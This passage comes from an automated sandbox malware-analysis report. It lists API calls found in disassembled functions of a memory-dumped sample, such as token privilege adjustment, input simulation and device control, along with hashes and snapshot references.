                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  • Opcode ID: 5db86270e9abae26ebba7fc7f0d14ad5f667ead771957aee95f2e91946ac1639
                                                                                                                  • Instruction ID: 8ba0badbc412ac86bfa7892aa6e4a04efad958123762774456934527f8a33caf
                                                                                                                  • Opcode Fuzzy Hash: 5db86270e9abae26ebba7fc7f0d14ad5f667ead771957aee95f2e91946ac1639
                                                                                                                  • Instruction Fuzzy Hash: 63213235A00118DFCB00EF95D895AEDFBF8FF49314F1584AAE905A7351DB719905CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                    • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
                                                                                                                  • GetLastError.KERNEL32 ref: 00E1B1BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1922334811-0
                                                                                                                  • Opcode ID: 9168ab246ec4bc91cd672cc719559605f9d27099b6016895f5d633a67a1e6ada
                                                                                                                  • Instruction ID: 67ea3ef4cefe14200326787b3c8f726663fcb5691479cdaa7a1947d74050e200
                                                                                                                  • Opcode Fuzzy Hash: 9168ab246ec4bc91cd672cc719559605f9d27099b6016895f5d633a67a1e6ada
                                                                                                                  • Instruction Fuzzy Hash: D811BFB1A04205BFE7189F64EC85D6BB7ADEF44310B21852EE456A3240DB70FC418A70
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E266AF
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00E266EC
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E266F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 33631002-0
                                                                                                                  • Opcode ID: 825231f4447095e387382334e9c9154e2f68cc3fcb12761dd17e647b63bf48d7
                                                                                                                  • Instruction ID: efaa7a7470b757e657033ca061c0da194a712fb0ddf025769a7d2ea3ff2d1d88
                                                                                                                  • Opcode Fuzzy Hash: 825231f4447095e387382334e9c9154e2f68cc3fcb12761dd17e647b63bf48d7
                                                                                                                  • Instruction Fuzzy Hash: A111A5B1E01228BFE7108BA8EC45FAF77BCEB09758F004656F901F7190C2B4AE0487A1
                                                                                                                  APIs
                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E27223
                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E2723A
                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00E2724A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3429775523-0
                                                                                                                  • Opcode ID: aebb33646604e4f83b7bc9858aabf0a25f55c24854073d42789316d3b3e9c977
                                                                                                                  • Instruction ID: 3c73c0af3b9056e17259614c14f0958b8084856e4f4c654f267e73a8ec42f6ed
                                                                                                                  • Opcode Fuzzy Hash: aebb33646604e4f83b7bc9858aabf0a25f55c24854073d42789316d3b3e9c977
                                                                                                                  • Instruction Fuzzy Hash: 1BF01D76E14209FFDF04DFE5DD99AEEBBB9EF08205F504469E602E2191E2709A449B10
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • GetParent.USER32(?), ref: 00E5E5B2
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DFB1E8,?,?,?,00000006,?), ref: 00E5E62C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314495775-0
                                                                                                                  • Opcode ID: 2f22d0c0105f3a6342eec088c765aff7bee14f49724f0f8c6dee02edc46cc55f
                                                                                                                  • Instruction ID: 3b8ff1f882828bc7e6734cb7fb3584c7319d52f1ae751d7748640f1d7a2222c2
                                                                                                                  • Opcode Fuzzy Hash: 2f22d0c0105f3a6342eec088c765aff7bee14f49724f0f8c6dee02edc46cc55f
                                                                                                                  • Instruction Fuzzy Hash: 5621A734600118AFCB148F28DC859BD3B95EB4A378F1D8293FA156B3E1D7309E05D721
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E2F599
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2F5C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0
                                                                                                                  • Opcode ID: 03658860c5d080f0b51b41a8c48861f947bfb8c29a2b2f85fd36374cfb75df92
                                                                                                                  • Instruction ID: 81a28fdbc64ede131d55aba6bed7b9ff2b9eaa48dc186bc3bfede0eba1488607
                                                                                                                  • Opcode Fuzzy Hash: 03658860c5d080f0b51b41a8c48861f947bfb8c29a2b2f85fd36374cfb75df92
                                                                                                                  • Instruction Fuzzy Hash: E011C4316046049FD710EF29D845A3EF3E8FF85324F05892EF9A5D7291CB70AD048B91
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E5E44F,?,?,?), ref: 00E4F344
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E4F32A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1273190321-0
                                                                                                                  • Opcode ID: 149a3717e7a59427e72e58ac475b452c03ffd5c3299b71e687e3a8b37cb447d4
                                                                                                                  • Instruction ID: 278d6d3756b2aa670f437b01dac16212ba45f35e2ea89da0905afdecbc85570c
                                                                                                                  • Opcode Fuzzy Hash: 149a3717e7a59427e72e58ac475b452c03ffd5c3299b71e687e3a8b37cb447d4
                                                                                                                  • Instruction Fuzzy Hash: 93012430204214EFCF219F15EC44FBA3BA6FB8A764F184164F9062B2E0C771AC06DB61
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4F6AC
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E5E52B,?,?,?,?,?), ref: 00E4F6D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3420055661-0
                                                                                                                  • Opcode ID: 4c29ff9445b8e2222d3a5d0c0316aeb499cca9948593a5ac76987e4cd058b33e
                                                                                                                  • Instruction ID: ae9d9721983bc3ecc8ac8c547af105dbd22e42c5097cd4bca99034f416ad0c91
                                                                                                                  • Opcode Fuzzy Hash: 4c29ff9445b8e2222d3a5d0c0316aeb499cca9948593a5ac76987e4cd058b33e
                                                                                                                  • Instruction Fuzzy Hash: C9F03A72900118FFEF048F86EC099AE7FB9EF48351F14405AF902A2160D7B1AA55EBA0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E3BE6A,?,?,00000000,?), ref: 00E2CEA7
                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E3BE6A,?,?,00000000,?), ref: 00E2CEB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479602957-0
                                                                                                                  • Opcode ID: 8171959cdb072814e401b4a781b6bfbb686f3345f843c53e331ffc0760398102
                                                                                                                  • Instruction ID: 195f143ae0f60e99161614edb7de8959a30d5f0c33e49475b0a7548a53d6bd05
                                                                                                                  • Opcode Fuzzy Hash: 8171959cdb072814e401b4a781b6bfbb686f3345f843c53e331ffc0760398102
                                                                                                                  • Instruction Fuzzy Hash: EBF08231504229EBDB20ABA5EC49FFA776DFF083A1F008166F919E6191D6709A54CBB0
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E24153
                                                                                                                  • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E24166
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 4a5ed800b93dde87a9bc4df475f5454e8fd269f42dfeb8021776297f4dc5fb32
• Instruction ID: 3f9f6b4a48693477071bee079e5bd74b58194a6ccc3d56048ec19efb6eeb5556
• Opcode Fuzzy Hash: 4a5ed800b93dde87a9bc4df475f5454e8fd269f42dfeb8021776297f4dc5fb32
• Instruction Fuzzy Hash: EBF067B090424DAFDB058FA1DC05BBE7BB0EF04309F00800AF966A6192D7B986169FA4
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E1ACC0), ref: 00E1AB99
• CloseHandle.KERNEL32(?,?,00E1ACC0), ref: 00E1ABAB
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 6be75cc8de847eb51d8392d6e38f2bb4b54f20887fae1bce0f726c3e76b810f2
• Instruction ID: 9a9d2e2576417bf9c1735d22f489cbb6f5fc63444e0adb4b29025244ad024b67
• Opcode Fuzzy Hash: 6be75cc8de847eb51d8392d6e38f2bb4b54f20887fae1bce0f726c3e76b810f2
• Instruction Fuzzy Hash: 5AE08631004510AFE7212F15FC08D7377E9EF00320715C429F55980430C7629C90DB60
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00E4F7CB
• NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E5E4AA,?,?,?,?), ref: 00E4F7F5
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 365f106302a095c3b887cec392147b1e296ad44a2632fff755fe8384de54a95e
• Instruction ID: 59c34d8ea4b577108b673001fea9c2d5150278b0058b5be85c7ce63c7069af1d
• Opcode Fuzzy Hash: 365f106302a095c3b887cec392147b1e296ad44a2632fff755fe8384de54a95e
• Instruction Fuzzy Hash: A7E0CD30204214FFEB150F09EC1EFBE3B18E704B90F508116F957A84E0D7F49490D260
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00E06DB3,-0000031A,?,?,00000001), ref: 00E081B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E081BA
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 447f0f66a1f3f99aac30f862bfa6ba8a8ac72d9844678cfd54d6299f1a5978eb
• Instruction ID: edc0c14680ff64addfae492aed3f794e000464af661c59abd1d289fcfbfb0997
• Opcode Fuzzy Hash: 447f0f66a1f3f99aac30f862bfa6ba8a8ac72d9844678cfd54d6299f1a5978eb
• Instruction Fuzzy Hash: 74B09231688608AFDB002BA3FC09B5A7F68EB086A2F804010F60D542618BB254248A96
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70d22d615b038513172744fdc062c47a037580add42aa3dd53b01aa274ccb434
• Instruction ID: f3227aed345607a7ee8101f1dd1d05142fb3b1ac50776cfc72fa36de96016fc6
• Opcode Fuzzy Hash: 70d22d615b038513172744fdc062c47a037580add42aa3dd53b01aa274ccb434
• Instruction Fuzzy Hash: 21323521D28F014DD7279635DD22336A288EFB73D5F15E737E819B5AAAEB29C4C34200
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: 226797e1349a47b984b2770ed3159f599eaf0317d836285ef8e9851314e47146
• Instruction ID: 5710552b95c078a08ecd6476e90a0cff8733958de3b4f6024ca4fe8f9f944972
• Opcode Fuzzy Hash: 226797e1349a47b984b2770ed3159f599eaf0317d836285ef8e9851314e47146
• Instruction Fuzzy Hash: F822AB716083409FD724EF25C8A0B6FB7E4EF84314F14492DF99A97291DB71E948CBA2
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
